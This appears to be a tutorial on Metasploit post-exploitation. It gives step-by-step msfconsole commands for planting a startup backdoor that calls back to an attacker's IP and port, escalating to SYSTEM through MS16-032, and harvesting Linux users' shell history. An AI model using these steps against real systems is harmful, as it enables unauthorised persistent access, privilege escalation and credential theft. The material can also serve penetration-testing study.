Leveraging Metasploit Modules for Maintaining Access
Maintaining Persistent Access
To maintain persistent access to the compromised system, Metasploit offers several modules that re-establish a session after a reboot or a dropped connection. One commonly used family is post/windows/manage/persistence_* (for example post/windows/manage/persistence_exe), which installs a backdoor that runs automatically at system startup. The backdoor only helps if a matching handler is listening on the LHOST and LPORT it calls back to, so the handler has to be part of the plan, not an afterthought.
sequenceDiagram
    participant Attacker
    participant Target
    Attacker->>Target: Initial Exploitation
    Target->>Attacker: Compromised System
    Attacker->>Target: Persistence Module Execution
    Target->>Attacker: Persistent Access Established
Persistence Module Example
- Launch the Metasploit console on the attacker's Ubuntu 22.04 system:
  msfconsole
- Select the persistence module. The wildcard stands for one concrete module name and must be replaced before the command will work, for example post/windows/manage/persistence_exe:
  use post/windows/manage/persistence_*
- Set the required options. Every post module needs SESSION, the number of the Meterpreter session it should act on (as in the examples further down). Modules that generate their own payload also take LHOST (the attacker's IP address) and LPORT (the port the backdoor connects back to); persistence_exe instead takes REXEPATH, a payload executable built beforehand with msfvenom, which has the callback address baked in:
  set LHOST 192.168.1.100
  set LPORT 4444
- Run the module to install the backdoor on the target. A handler (exploit/multi/handler) with the same payload, LHOST and LPORT must be listening whenever the target boots, otherwise the callback has nowhere to land:
  run
Privilege Escalation
Gaining elevated privileges on the compromised system is crucial for further exploitation and information gathering. Metasploit's local privilege escalation exploits live under exploit/windows/local/* and exploit/linux/local/*, alongside helper post modules such as post/windows/escalate/* (for example getsystem). Each takes the SESSION to escalate; the local exploit modules spawn a new payload and therefore open a fresh, elevated session rather than upgrading the existing one, so keep track of the new session number.
Privilege Escalation Example (Windows)
- Use the exploit/windows/local/ms16_032_secondary_logon_handle_privesc module (MS16-032 is a local exploit, so it lives under exploit/windows/local rather than post/windows/escalate):
  use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
- Set the required options, such as the SESSION number of the Meterpreter session to escalate:
  set SESSION 1
- Run the module to attempt privilege escalation. It only succeeds on hosts missing the MS16-032 patch; on success a new session running as SYSTEM is opened and the original session is left as it was:
  run
Information Gathering
Metasploit's post-exploitation modules can be used to gather valuable information about the compromised system, such as user accounts, network configurations, running processes and the shell history of local users. This information can be used to further expand the attacker's access and control over the target system, for example by revealing credentials or internal hosts referenced in command history.
Information Gathering Example (Linux)
- Use the post/linux/gather/enum_users_history module:
  use post/linux/gather/enum_users_history
- Set the required options, such as the SESSION number:
  set SESSION 1
- Run the module to gather user history information:
  run
The information gathered through these post-exploitation modules can be used to plan the next steps in the attack, such as lateral movement or data exfiltration.